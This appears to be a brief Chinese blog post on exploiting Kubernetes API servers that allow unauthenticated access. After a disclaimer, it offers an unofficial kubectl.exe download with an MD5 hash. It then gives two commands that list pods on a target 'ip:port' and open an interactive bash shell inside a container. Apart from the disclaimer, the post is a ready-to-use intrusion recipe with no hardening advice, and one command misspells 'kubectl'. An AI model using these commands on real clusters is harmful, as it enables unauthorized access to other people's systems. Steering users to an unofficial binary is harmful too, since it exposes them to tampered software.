Kubernetes Api Server 未授权访问漏洞GetShell

本文仅作为技术讨论及分享，严禁用于任何非法用途。

下载kubectl客户端

参考官方文档
因为官方从Google下载，国内下载可能比较困难，这里提供一个Windows版本的kubectl客户端（下载地址)

MD5:eb9039d1285045b48313766aebf3558e *kubectl.exe

获取容器shell

kubtctl.exe -s ip:port get pods
kubectl.exe -s ip:port --namespace=default exec -it <CONTAINER ID> bash

参考

Kubernetes Api Server 未授权访问漏洞